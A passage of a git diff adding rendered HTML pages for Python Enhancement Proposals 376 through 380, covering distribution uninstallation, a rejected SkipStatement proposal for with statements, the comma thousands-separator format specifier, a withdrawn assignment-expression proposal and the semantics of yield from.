As explained earlier in this PEP, the install command adds an INSTALLER +file in the .dist-info directory with the name of the installer.

+

To avoid removing distributions that were installed by another packaging +system, the uninstall function takes an extra argument installer which +defaults to distutils2.

+

When called, uninstall checks that the INSTALLER file matches this argument. If not, it raises a DistutilsUninstallError:

+
>>> uninstall('docutils')
+Traceback (most recent call last):
+...
+DistutilsUninstallError: docutils was installed by 'cool-pkg-manager'
+
+>>> uninstall('docutils', installer='cool-pkg-manager')
+
+
+

This allows a third-party application to use the uninstall function and strongly suggest that no other program remove a distribution it has previously installed. This is useful when a third-party program that relies on Distutils APIs performs extra steps on the system at installation time that it has to undo at uninstallation time.

+
+
+

Adding an Uninstall script

+

An uninstall script is added in Distutils2 and is used like this:

+
$ python -m distutils2.uninstall projectname
+
+
+

Notice that the script doesn't check whether the removal of a distribution breaks another distribution. It does, however, make sure, by using the uninstall function, that all the files it removes are not used by any other distribution.

+

Also note that this uninstall script pays no attention to the +REQUESTED metadata; that is provided only for use by external tools to +provide more advanced dependency management.

+
+
+
+
+

Backward compatibility and roadmap

+

These changes don’t introduce any compatibility problems since they +will be implemented in:

+
    +
  • pkgutil in new functions
  • +
  • distutils2
  • +
+

The plan is to include the functionality outlined in this PEP in pkgutil for +Python 3.2, and in Distutils2.

+

Distutils2 will also contain a backport of the new pkgutil, and can be used with Python 2.4 onward.

+

Distributions installed using existing, pre-standardization formats do not have the necessary metadata available for the new API, and thus will be ignored. Third-party tools may of course continue to support previous formats in addition to the new format, in order to ease the transition.

+
+
+

References

+ +
+
+

Acknowledgements

+

Jim Fulton, Ian Bicking, Phillip Eby, Rafael Villar Burke, and many people at +Pycon and Distutils-SIG.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0376.rst

+

Last modified: 2024-12-15 20:57:13 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0377/index.html b/pep-0377/index.html new file mode 100644 index 00000000000..29dba8e92a4 --- /dev/null +++ b/pep-0377/index.html @@ -0,0 +1,394 @@ + + + + + + + + PEP 377 – Allow __enter__() methods to skip the statement body | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 377 – Allow __enter__() methods to skip the statement body

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
08-Mar-2009
+
Python-Version:
+
2.7, 3.1
+
Post-History:
+
08-Mar-2009
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a backwards compatible mechanism that allows __enter__() +methods to skip the body of the associated with statement. The lack of +this ability currently means the contextlib.contextmanager decorator +is unable to fulfil its specification of being able to turn arbitrary +code into a context manager by moving it into a generator function +with a yield in the appropriate location. One symptom of this is that +contextlib.nested will currently raise RuntimeError in +situations where writing out the corresponding nested with +statements would not [1].

+

The proposed change is to introduce a new flow control exception +SkipStatement, and skip the execution of the with +statement body if __enter__() raises this exception.

+
+
+

PEP Rejection

+

This PEP was rejected by Guido [4] as it imposes too great an increase +in complexity without a proportional increase in expressiveness and +correctness. In the absence of compelling use cases that need the more +complex semantics proposed by this PEP the existing behaviour is +considered acceptable.

+
+
+

Proposed Change

+

The semantics of the with statement will be changed to include a +new try/except/else block around the call to __enter__(). +If SkipStatement is raised by the __enter__() method, then +the main section of the with statement (now located in the else +clause) will not be executed. To avoid leaving the names in any as +clause unbound in this case, a new StatementSkipped singleton +(similar to the existing NotImplemented singleton) will be +assigned to all names that appear in the as clause.

+

The components of the with statement remain as described in PEP 343:

+
with EXPR as VAR:
+    BLOCK
+
+
+

After the modification, the with statement semantics would +be as follows:

+
mgr = (EXPR)
+exit = mgr.__exit__  # Not calling it yet
+try:
+    value = mgr.__enter__()
+except SkipStatement:
+    VAR = StatementSkipped
+    # Only if "as VAR" is present and
+    # VAR is a single name
+    # If VAR is a tuple of names, then StatementSkipped
+    # will be assigned to each name in the tuple
+else:
+    exc = True
+    try:
+        try:
+            VAR = value  # Only if "as VAR" is present
+            BLOCK
+        except:
+            # The exceptional case is handled here
+            exc = False
+            if not exit(*sys.exc_info()):
+                raise
+            # The exception is swallowed if exit() returns true
+    finally:
+        # The normal and non-local-goto cases are handled here
+        if exc:
+            exit(None, None, None)
+
+
+
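For illustration, here is a hypothetical context manager written against the proposed semantics. Since the PEP was rejected, SkipStatement and StatementSkipped exist only in this proposal, and OnlyWhen, user_is_admin and grant_access are placeholder names, so this sketch is not runnable on any released Python:

class OnlyWhen(object):
    # Run the with statement body only when the condition holds.
    def __init__(self, condition):
        self.condition = condition
    def __enter__(self):
        if not self.condition:
            raise SkipStatement  # proposed flow control exception
        return self.condition
    def __exit__(self, *exc_info):
        return False

with OnlyWhen(user_is_admin) as flag:
    grant_access()
# When the body is skipped, 'flag' is bound to StatementSkipped.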

With the above change in place for the with statement semantics, +contextlib.contextmanager() will then be modified to raise +SkipStatement instead of RuntimeError when the underlying +generator doesn’t yield.

+
+
+

Rationale for Change

+

Currently, some apparently innocuous context managers may raise +RuntimeError when executed. This occurs when the context +manager’s __enter__() method encounters a situation where +the written out version of the code corresponding to the +context manager would skip the code that is now the body +of the with statement. Since the __enter__() method +has no mechanism available to signal this to the interpreter, +it is instead forced to raise an exception that not only +skips the body of the with statement, but also jumps over +all code until the nearest exception handler. This goes against +one of the design goals of the with statement, which was to +be able to factor out arbitrary common exception handling code +into a single context manager by putting into a generator +function and replacing the variant part of the code with a +yield statement.

+

Specifically, the following examples behave differently if +cmB().__enter__() raises an exception which cmA().__exit__() +then handles and suppresses:

+
with cmA():
+  with cmB():
+    do_stuff()
+# This will resume here without executing "do_stuff()"
+
+@contextlib.contextmanager
+def combined():
+  with cmA():
+    with cmB():
+      yield
+
+with combined():
+  do_stuff()
+# This will raise a RuntimeError complaining that the context
+# manager's underlying generator didn't yield
+
+with contextlib.nested(cmA(), cmB()):
+  do_stuff()
+# This will raise the same RuntimeError as the contextmanager()
+# example (unsurprising, given that the nested() implementation
+# uses contextmanager())
+
+# The following class based version shows that the issue isn't
+# specific to contextlib.contextmanager() (it also shows how
+# much simpler it is to write context managers as generators
+# instead of as classes!)
+class CM(object):
+  def __init__(self):
+    self.cmA = None
+    self.cmB = None
+
+  def __enter__(self):
+    if self.cmA is not None:
+      raise RuntimeError("Can't re-use this CM")
+    self.cmA = cmA()
+    self.cmA.__enter__()
+    try:
+      self.cmB = cmB()
+      self.cmB.__enter__()
+    except:
+      self.cmA.__exit__(*sys.exc_info())
+      # Can't suppress in __enter__(), so must raise
+      raise
+
+  def __exit__(self, *args):
+    suppress = False
+    try:
+      if self.cmB is not None:
+        suppress = self.cmB.__exit__(*args)
+    except:
+      suppress = self.cmA.__exit__(*sys.exc_info())
+      if not suppress:
+        # Exception has changed, so reraise explicitly
+        raise
+    else:
+      if suppress:
+        # cmB already suppressed the exception,
+        # so don't pass it to cmA
+        suppress = self.cmA.__exit__(None, None, None)
+      else:
+        suppress = self.cmA.__exit__(*args)
+    return suppress
+
+
+

With the proposed semantic change in place, the contextlib based examples +above would then “just work”, but the class based version would need +a small adjustment to take advantage of the new semantics:

+
class CM(object):
+  def __init__(self):
+    self.cmA = None
+    self.cmB = None
+
+  def __enter__(self):
+    if self.cmA is not None:
+      raise RuntimeError("Can't re-use this CM")
+    self.cmA = cmA()
+    self.cmA.__enter__()
+    try:
+      self.cmB = cmB()
+      self.cmB.__enter__()
+    except:
+      if self.cmA.__exit__(*sys.exc_info()):
+        # Suppress the exception, but don't run
+        # the body of the with statement either
+        raise SkipStatement
+      raise
+
+  def __exit__(self, *args):
+    suppress = False
+    try:
+      if self.cmB is not None:
+        suppress = self.cmB.__exit__(*args)
+    except:
+      suppress = self.cmA.__exit__(*sys.exc_info())
+      if not suppress:
+        # Exception has changed, so reraise explicitly
+        raise
+    else:
+      if suppress:
+        # cmB already suppressed the exception,
+        # so don't pass it to cmA
+        suppress = self.cmA.__exit__(None, None, None)
+      else:
+        suppress = self.cmA.__exit__(*args)
+    return suppress
+
+
+

There is currently a tentative suggestion [3] to add import-style syntax to +the with statement to allow multiple context managers to be included in +a single with statement without needing to use contextlib.nested. In +that case the compiler has the option of simply emitting multiple with +statements at the AST level, thus allowing the semantics of actual nested +with statements to be reproduced accurately. However, such a change +would highlight rather than alleviate the problem the current PEP aims to +address: it would not be possible to use contextlib.contextmanager to +reliably factor out such with statements, as they would exhibit exactly +the same semantic differences as are seen with the combined() context +manager in the above example.

+
+
+

Performance Impact

+

Implementing the new semantics makes it necessary to store the references +to the __enter__ and __exit__ methods in temporary variables instead +of on the stack. This results in a slight regression in with statement +speed relative to Python 2.6/3.1. However, implementing a custom +SETUP_WITH opcode would negate any differences between the two +approaches (as well as dramatically improving speed by eliminating more +than a dozen unnecessary trips around the eval loop).

+
+
+

Reference Implementation

+

Patch attached to Issue 5251 [1]. That patch uses only existing opcodes +(i.e. no SETUP_WITH).

+
+
+

Acknowledgements

+

James William Pye both raised the issue and suggested the basic outline of +the solution described in this PEP.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0377.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0378/index.html b/pep-0378/index.html new file mode 100644 index 00000000000..f16d8798299 --- /dev/null +++ b/pep-0378/index.html @@ -0,0 +1,319 @@ + + + + + + + + PEP 378 – Format Specifier for Thousands Separator | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 378 – Format Specifier for Thousands Separator

+
+
Author:
+
Raymond Hettinger <python at rcn.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
12-Mar-2009
+
Python-Version:
+
2.7, 3.1
+
Post-History:
+
12-Mar-2009
+
+
+
+
Table of Contents +
+
+

Motivation

+

Provide a simple, non-locale aware way to format a number +with a thousands separator.

+

Adding thousands separators is one of the simplest ways to +humanize a program’s output, improving its professional appearance +and readability.

+

In the finance world, output with thousands separators is the norm. +Finance users and non-professional programmers find the locale +approach to be frustrating, arcane and non-obvious.

+

The locale module presents two other challenges. First, it is +a global setting and not suitable for multi-threaded apps that +need to serve-up requests in multiple locales. Second, the +name of a relevant locale (such as “de_DE”) can vary from +platform to platform or may not be defined at all. The docs +for the locale module describe these and many other challenges +in detail.

+

It is not the goal to replace the locale module, to perform +internationalization tasks, or accommodate every possible +convention. Such tasks are better suited to robust tools like +Babel. Instead, the goal is to make a common, everyday +task easier for many users.

+
+
+

Main Proposal (from Alyssa Coghlan, originally called Proposal I)

+

A comma will be added to the format() specifier mini-language:

+
[[fill]align][sign][#][0][width][,][.precision][type]
+
+
+

The ‘,’ option indicates that commas should be included in the +output as a thousands separator. As with locales which do not +use a period as the decimal point, locales which use a +different convention for digit separation will need to use the +locale module to obtain appropriate formatting.

+

The proposal works well with floats, ints, and decimals. +It also allows easy substitution for other separators. +For example:

+
format(n, "6,d").replace(",", "_")
+
+
+

This technique is completely general but it is awkward in the +one case where the commas and periods need to be swapped:

+
format(n, "6,f").replace(",", "X").replace(".", ",").replace("X", ".")
+
+
+

The width argument means the total length including the commas +and decimal point:

+
format(1234, "08,d")     -->    '0001,234'
+format(1234.5, "08,.1f") -->    '01,234.5'
+
+
+

The ‘,’ option is defined as shown above for types ‘d’, ‘e’, +‘f’, ‘g’, ‘E’, ‘G’, ‘%’, ‘F’ and ‘’. To allow future extensions, it is +undefined for other types: binary, octal, hex, character, +etc.

+

This proposal has the virtue of being simpler than the alternative +proposal but is much less flexible and meets the needs of fewer +users right out of the box. It is expected that some other +solution will arise for specifying alternative separators.
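Since this proposal was accepted, its behaviour can be checked directly in any Python 2.7/3.1 or later interpreter:

>>> format(1234567, ',d')
'1,234,567'
>>> format(1234567.891, ',.2f')
'1,234,567.89'
>>> '{:,}'.format(10**9)
'1,000,000,000'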

+
+
+

Current Version of the Mini-Language

+ +
+
+

Research into what Other Languages Do

+

Scanning the web, I’ve found that thousands separators are +usually one of COMMA, DOT, SPACE, APOSTROPHE or UNDERSCORE.

+

C-Sharp provides both styles (picture formatting and type specifiers). +The type specifier approach is locale aware. The picture formatting only +offers a COMMA as a thousands separator:

+
String.Format("{0:n}", 12400)     ==>    "12,400"
+String.Format("{0:0,0}", 12400)   ==>    "12,400"
+
+
+

Common Lisp uses a COLON before the ~D decimal type specifier to +emit a COMMA as a thousands separator. The general form of ~D is +~mincol,padchar,commachar,commaintervalD. The padchar defaults +to SPACE. The commachar defaults to COMMA. The commainterval +defaults to three.

+
(format nil "~:D" 229345007)   =>   "229,345,007"
+
+
+
    +
  • The ADA language allows UNDERSCORES in its numeric literals.
  • +
+

Visual Basic and its brethren (like MS Excel) use a completely +different style and have ultra-flexible custom format +specifiers like:

+
"_($* #,##0_)".
+
+
+

COBOL uses picture clauses like:

+
PICTURE $***,**9.99CR
+
+
+

Java offers a Decimal.Format Class that uses picture patterns (one +for positive numbers and an optional one for negatives) such as: +"#,##0.00;(#,##0.00)". It allows arbitrary groupings including +hundreds and ten-thousands and uneven groupings. The special pattern +characters are non-localized (using a DOT for a decimal separator and +a COMMA for a grouping separator). The user can supply an alternate +set of symbols using the formatter’s DecimalFormatSymbols object.

+
+
+

Alternative Proposal (from Eric Smith, originally called Proposal II)

+

Make both the thousands separator and decimal separator user +specifiable but not locale aware. For simplicity, limit the +choices to a COMMA, DOT, SPACE, APOSTROPHE or UNDERSCORE. +The SPACE can be either U+0020 or U+00A0.

+

Whenever a separator is followed by a precision, it is a +decimal separator and an optional separator preceding it is a +thousands separator. When the precision is absent, a lone +specifier means a thousands separator:

+
[[fill]align][sign][#][0][width][tsep][dsep precision][type]
+
+
+

Examples:

+
format(1234, "8.1f")     -->    '  1234.0'
+format(1234, "8,1f")     -->    '  1234,0'
+format(1234, "8.,1f")    -->    ' 1.234,0'
+format(1234, "8 ,f")     -->    ' 1 234,0'
+format(1234, "8d")       -->    '    1234'
+format(1234, "8,d")      -->    '   1,234'
+format(1234, "8_d")      -->    '   1_234'
+
+
+

This proposal meets most needs, but it comes at the expense of taking a bit more effort to parse. Not every possible convention is covered, but at least one of the options (spaces or underscores) should be readable, understandable, and useful to folks from many diverse backgrounds.

+

As shown in the examples, the width argument means the total +length including the thousands separators and decimal separators.

+

No change is proposed for the locale module.

+

The thousands separator is defined as shown above for types +‘d’, ‘e’, ‘f’, ‘g’, ‘%’, ‘E’, ‘G’ and ‘F’. To allow future +extensions, it is undefined for other types: binary, octal, +hex, character, etc.

+

The drawback to this alternative proposal is the difficulty +of mentally parsing whether a single separator is a thousands +separator or decimal separator. Perhaps it is too arcane +to link the decimal separator with the precision specifier.

+
+
+

Commentary

+
    +
  • Some commenters do not like the idea of format strings at all +and find them to be unreadable. Suggested alternatives include +the COBOL style PICTURE approach or a convenience function with +keyword arguments for every possible combination.
  • +
  • Some newsgroup respondents think there is no place for any scripts that are not internationalized and that it is a step backwards to provide a simple way to hardwire a particular choice (thus reducing the incentive to use a locale sensitive approach).
  • +
  • Another thought is that embedding some particular convention in +individual format strings makes it hard to change that convention +later. No workable alternative was suggested but the general idea +is to set the convention once and have it apply everywhere (others +commented that locale already provides a way to do this).
  • +
  • There are some precedents for grouping digits in the fractional +part of a floating point number, but this PEP does not venture into +that territory. Only digits to the left of the decimal point are +grouped. This does not preclude future extensions; it just focuses +on a single, generally useful extension to the formatting language.
  • +
  • James Knight observed that Indian/Pakistani numbering systems group by hundreds. Ben Finney noted that Chinese group by ten-thousands. Eric Smith pointed out that these are already handled by the “n” specifier in the locale module (albeit only for integers). This PEP does not attempt to support all of those possibilities. It focuses on a single, relatively common grouping convention that offers a quick way to improve readability in many (though not all) contexts.
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0378.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0379/index.html b/pep-0379/index.html new file mode 100644 index 00000000000..0d91a7b6868 --- /dev/null +++ b/pep-0379/index.html @@ -0,0 +1,301 @@ + + + + + + + + PEP 379 – Adding an Assignment Expression | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 379 – Adding an Assignment Expression

+
+
Author:
+
Jervis Whitley <jervisau at gmail.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
14-Mar-2009
+
Python-Version:
+
2.7, 3.2
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP adds a new assignment expression to the Python language +to make it possible to assign the result of an expression in +almost any place. The new expression will allow the assignment of +the result of an expression at first use (in a comparison for +example).

+
+
+

Motivation and Summary

+

Issue1714448 “if something as x:” [1] describes a feature to allow assignment of the result of an expression in an if statement to a name. It proposed that the as syntax could be borrowed for this purpose. Many times it is not the expression itself that is interesting, rather one of the terms that make up the expression. To be clear, something like this:

+
if (f_result() == [1, 2, 3]) as res:
+
+
+

seems awfully limited, when this:

+
if (f_result() as res) == [1, 2, 3]:
+
+
+

is probably the desired result.

+
+
+

Use Cases

+

See the Examples section near the end.

+
+
+

Specification

+

A new expression is proposed with the (nominal) syntax:

+
EXPR -> VAR
+
+
+

This single expression does the following:

+
    +
  • Evaluate the value of EXPR, an arbitrary expression;
  • +
  • Assign the result to VAR, a single assignment target; and
  • +
  • Leave the result of EXPR on the Top of Stack (TOS)
  • +
+

Here -> or (RARROW) has been used to illustrate the concept that +the result of EXPR is assigned to VAR.

+

The translation of the proposed syntax is:

+
VAR = (EXPR)
+(EXPR)
+
+
+
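Concretely, the motivating comparison shown earlier, written with the proposed syntax as if (f_result() -> res) == [1, 2, 3]:, is intended to behave like today's two-statement spelling, evaluating f_result() once and reusing the result (f_result and dosomething are the placeholder names used elsewhere in this PEP):

res = f_result()
if res == [1, 2, 3]:
    dosomething(res)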

The assignment target can be either an attribute, a subscript or +name:

+
f() -> name[0]      # where 'name' exists previously.
+
+f() -> name.attr    # again 'name' exists prior to this expression.
+
+f() -> name
+
+
+

This expression should be available anywhere that an expression is +currently accepted.

+

All exceptions that are currently raised during invalid assignments will continue to be raised when using the assignment expression. For example, a NameError will be raised in examples 1 and 2 above if name is not previously defined, or an IndexError if index 0 is out of range.

+
+
+

Examples from the Standard Library

+

The following two examples were chosen after a brief search +through the standard library, specifically both are from ast.py +which happened to be open at the time of the search.

+

Original:

+
def walk(node):
+    from collections import deque
+    todo = deque([node])
+    while todo:
+        node = todo.popleft()
+        todo.extend(iter_child_nodes(node))
+        yield node
+
+
+

Using assignment expression:

+
def walk(node):
+    from collections import deque
+    todo = deque([node])
+    while todo:
+        todo.extend(iter_child_nodes(todo.popleft() -> node))
+        yield node
+
+
+

Original:

+
def get_docstring(node, clean=True):
+    if not isinstance(node, (FunctionDef, ClassDef, Module)):
+        raise TypeError("%r can't have docstrings"
+                            % node.__class__.__name__)
+    if node.body and isinstance(node.body[0], Expr) and \
+    isinstance(node.body[0].value, Str):
+        if clean:
+            import inspect
+            return inspect.cleandoc(node.body[0].value.s)
+        return node.body[0].value.s
+
+
+

Using assignment expression:

+
def get_docstring(node, clean=True):
+    if not isinstance(node, (FunctionDef, ClassDef, Module)):
+        raise TypeError("%r can't have docstrings"
+                            % node.__class__.__name__)
+    if node.body -> body and isinstance(body[0] -> elem, Expr) and \
+    isinstance(elem.value -> value, Str):
+        if clean:
+            import inspect
+            return inspect.cleandoc(value.s)
+        return value.s
+
+
+
+
+

Examples

+

The examples shown below highlight some of the desirable features +of the assignment expression, and some of the possible corner +cases.

+
    +
  1. Assignment in an if statement for use later:
    def expensive():
    +    import time; time.sleep(1)
    +    return 'spam'
    +
    +if expensive() -> res in ('spam', 'eggs'):
    +    dosomething(res)
    +
    +
    +
  2. +
  3. Assignment in a while loop clause:
    while len(expensive() -> res) == 4:
    +    dosomething(res)
    +
    +
    +
  4. +
  5. Keep the iterator object from the for loop:
    for ch in expensive() -> res:
    +    sell_on_internet(res)
    +
    +
    +
  6. +
  7. Corner case:
    for ch -> please_dont in expensive():
    +    pass
    +# who would want to do this? Not I.
    +
    +
    +
  8. +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0379.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0380/index.html b/pep-0380/index.html new file mode 100644 index 00000000000..68297aab90a --- /dev/null +++ b/pep-0380/index.html @@ -0,0 +1,548 @@ + + + + + + + + PEP 380 – Syntax for Delegating to a Subgenerator | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 380 – Syntax for Delegating to a Subgenerator

+
+
Author:
+
Gregory Ewing <greg.ewing at canterbury.ac.nz>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
13-Feb-2009
+
Python-Version:
+
3.3
+
Post-History:
+

+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

A syntax is proposed for a generator to delegate part of its +operations to another generator. This allows a section of code +containing ‘yield’ to be factored out and placed in another generator. +Additionally, the subgenerator is allowed to return with a value, and +the value is made available to the delegating generator.

+

The new syntax also opens up some opportunities for optimisation when +one generator re-yields values produced by another.

+
+
+

PEP Acceptance

+

Guido officially accepted the PEP on 26th June, 2011.

+
+
+

Motivation

+

A Python generator is a form of coroutine, but has the limitation that +it can only yield to its immediate caller. This means that a piece of +code containing a yield cannot be factored out and put into a +separate function in the same way as other code. Performing such a +factoring causes the called function to itself become a generator, and +it is necessary to explicitly iterate over this second generator and +re-yield any values that it produces.

+

If yielding of values is the only concern, this can be performed +without much difficulty using a loop such as

+
for v in g:
+    yield v
+
+
+

However, if the subgenerator is to interact properly with the caller +in the case of calls to send(), throw() and close(), +things become considerably more difficult. As will be seen later, the +necessary code is very complicated, and it is tricky to handle all the +corner cases correctly.

+

A new syntax will be proposed to address this issue. In the simplest +use cases, it will be equivalent to the above for-loop, but it will +also handle the full range of generator behaviour, and allow generator +code to be refactored in a simple and straightforward way.

+
+
+

Proposal

+

The following new expression syntax will be allowed in the body of a +generator:

+
yield from <expr>
+
+
+

where <expr> is an expression evaluating to an iterable, from which an +iterator is extracted. The iterator is run to exhaustion, during which +time it yields and receives values directly to or from the caller of +the generator containing the yield from expression (the +“delegating generator”).

+

Furthermore, when the iterator is another generator, the subgenerator +is allowed to execute a return statement with a value, and that +value becomes the value of the yield from expression.

+

The full semantics of the yield from expression can be described in terms of the generator protocol as follows (a short runnable illustration appears after this list):

+
    +
  • Any values that the iterator yields are passed directly to the +caller.
  • +
  • Any values sent to the delegating generator using send() are +passed directly to the iterator. If the sent value is None, the +iterator’s __next__() method is called. If the sent value +is not None, the iterator’s send() method is called. If the +call raises StopIteration, the delegating generator is resumed. +Any other exception is propagated to the delegating generator.
  • +
  • Exceptions other than GeneratorExit thrown into the delegating +generator are passed to the throw() method of the iterator. +If the call raises StopIteration, the delegating generator is +resumed. Any other exception is propagated to the delegating +generator.
  • +
  • If a GeneratorExit exception is thrown into the delegating +generator, or the close() method of the delegating generator +is called, then the close() method of the iterator is called +if it has one. If this call results in an exception, it is +propagated to the delegating generator. Otherwise, +GeneratorExit is raised in the delegating generator.
  • +
  • The value of the yield from expression is the first argument +to the StopIteration exception raised by the iterator when +it terminates.
  • +
  • return expr in a generator causes StopIteration(expr) to +be raised upon exit from the generator.
  • +
+
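As promised above, here is a short runnable illustration of this protocol as it shipped in Python 3.3; accumulate and gather are names invented for this example:

def accumulate():
    # Subgenerator: sums values passed in via send() until None
    # arrives, then returns the total (raising StopIteration(total)).
    total = 0
    while True:
        value = yield
        if value is None:
            return total
        total += value

def gather(results):
    # Delegating generator: "yield from" forwards sent values to the
    # subgenerator and evaluates to its return value.
    while True:
        results.append((yield from accumulate()))

results = []
g = gather(results)
next(g)          # prime the delegating generator
for x in (1, 2, 3):
    g.send(x)    # passed straight through to accumulate()
g.send(None)     # ends one accumulation round; appends 6
print(results)   # [6]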
+

Enhancements to StopIteration

+

For convenience, the StopIteration exception will be given a +value attribute that holds its first argument, or None if there +are no arguments.

+
+
+

Formal Semantics

+

Python 3 syntax is used in this section.

+
    +
  1. The statement
    RESULT = yield from EXPR
    +
    +
    +

    is semantically equivalent to

    +
    _i = iter(EXPR)
    +try:
    +    _y = next(_i)
    +except StopIteration as _e:
    +    _r = _e.value
    +else:
    +    while 1:
    +        try:
    +            _s = yield _y
    +        except GeneratorExit as _e:
    +            try:
    +                _m = _i.close
    +            except AttributeError:
    +                pass
    +            else:
    +                _m()
    +            raise _e
    +        except BaseException as _e:
    +            _x = sys.exc_info()
    +            try:
    +                _m = _i.throw
    +            except AttributeError:
    +                raise _e
    +            else:
    +                try:
    +                    _y = _m(*_x)
    +                except StopIteration as _e:
    +                    _r = _e.value
    +                    break
    +        else:
    +            try:
    +                if _s is None:
    +                    _y = next(_i)
    +                else:
    +                    _y = _i.send(_s)
    +            except StopIteration as _e:
    +                _r = _e.value
    +                break
    +RESULT = _r
    +
    +
    +
  2. +
  3. In a generator, the statement
    return value
    +
    +
    +

    is semantically equivalent to

    +
    raise StopIteration(value)
    +
    +
    +

    except that, as currently, the exception cannot be caught by +except clauses within the returning generator.

    +
  4. +
  5. The StopIteration exception behaves as though defined thusly:
    class StopIteration(Exception):
    +
    +    def __init__(self, *args):
    +        if len(args) > 0:
    +            self.value = args[0]
    +        else:
    +            self.value = None
    +        Exception.__init__(self, *args)
    +
    +
    +
  6. +
+
+
+
+

Rationale

+
+

The Refactoring Principle

+

The rationale behind most of the semantics presented above stems from +the desire to be able to refactor generator code. It should be +possible to take a section of code containing one or more yield +expressions, move it into a separate function (using the usual +techniques to deal with references to variables in the surrounding +scope, etc.), and call the new function using a yield from +expression.

+

The behaviour of the resulting compound generator should be, as far as +reasonably practicable, the same as the original unfactored generator +in all situations, including calls to __next__(), send(), +throw() and close().

+

The semantics in cases of subiterators other than generators has been +chosen as a reasonable generalization of the generator case.

+

The proposed semantics have the following limitations with regard to +refactoring:

+
    +
  • A block of code that catches GeneratorExit without subsequently +re-raising it cannot be factored out while retaining exactly the +same behaviour.
  • +
  • Factored code may not behave the same way as unfactored code if a +StopIteration exception is thrown into the delegating generator.
  • +
+

With use cases for these being rare to non-existent, it was not +considered worth the extra complexity required to support them.

+
+
+

Finalization

+

There was some debate as to whether explicitly finalizing the +delegating generator by calling its close() method while it is +suspended at a yield from should also finalize the subiterator. +An argument against doing so is that it would result in premature +finalization of the subiterator if references to it exist elsewhere.

+

Consideration of non-refcounting Python implementations led to the +decision that this explicit finalization should be performed, so that +explicitly closing a factored generator has the same effect as doing +so to an unfactored one in all Python implementations.

+

The assumption made is that, in the majority of use cases, the +subiterator will not be shared. The rare case of a shared subiterator +can be accommodated by means of a wrapper that blocks throw() and +close() calls, or by using a means other than yield from to +call the subiterator.

+
+
+

Generators as Threads

+

A motivation for generators being able to return values concerns the +use of generators to implement lightweight threads. When using +generators in that way, it is reasonable to want to spread the +computation performed by the lightweight thread over many functions. +One would like to be able to call a subgenerator as though it were an +ordinary function, passing it parameters and receiving a returned +value.

+

Using the proposed syntax, a statement such as

+
y = f(x)
+
+
+

where f is an ordinary function, can be transformed into a delegation +call

+
y = yield from g(x)
+
+
+

where g is a generator. One can reason about the behaviour of the +resulting code by thinking of g as an ordinary function that can be +suspended using a yield statement.

+

When using generators as threads in this way, typically one is not +interested in the values being passed in or out of the yields. +However, there are use cases for this as well, where the thread is +seen as a producer or consumer of items. The yield from +expression allows the logic of the thread to be spread over as many +functions as desired, with the production or consumption of items +occurring in any subfunction, and the items are automatically routed to +or from their ultimate source or destination.

+

Concerning throw() and close(), it is reasonable to expect +that if an exception is thrown into the thread from outside, it should +first be raised in the innermost generator where the thread is +suspended, and propagate outwards from there; and that if the thread +is terminated from outside by calling close(), the chain of active +generators should be finalised from the innermost outwards.

+
+
+

Syntax

+

The particular syntax proposed has been chosen as suggestive of its +meaning, while not introducing any new keywords and clearly standing +out as being different from a plain yield.

+
+
+

Optimisations

+

Using a specialised syntax opens up possibilities for optimisation +when there is a long chain of generators. Such chains can arise, for +instance, when recursively traversing a tree structure. The overhead +of passing __next__() calls and yielded values down and up the +chain can cause what ought to be an O(n) operation to become, in the +worst case, O(n**2).

+

A possible strategy is to add a slot to generator objects to hold a +generator being delegated to. When a __next__() or send() +call is made on the generator, this slot is checked first, and if it +is nonempty, the generator that it references is resumed instead. If +it raises StopIteration, the slot is cleared and the main generator is +resumed.

+

This would reduce the delegation overhead to a chain of C function calls involving no Python code execution. A possible enhancement would be to traverse the whole chain of generators in a loop and directly resume the one at the end, although the handling of StopIteration is then more complicated.

+
+
+

Use of StopIteration to return values

+

There are a variety of ways that the return value from the generator +could be passed back. Some alternatives include storing it as an +attribute of the generator-iterator object, or returning it as the +value of the close() call to the subgenerator. However, the +proposed mechanism is attractive for a couple of reasons:

+
    +
  • Using a generalization of the StopIteration exception makes it easy +for other kinds of iterators to participate in the protocol without +having to grow an extra attribute or a close() method.
  • +
  • It simplifies the implementation, because the point at which the +return value from the subgenerator becomes available is the same +point at which the exception is raised. Delaying until any later +time would require storing the return value somewhere.
  • +
+
+
+

Rejected Ideas

+

Some ideas were discussed but rejected.

+

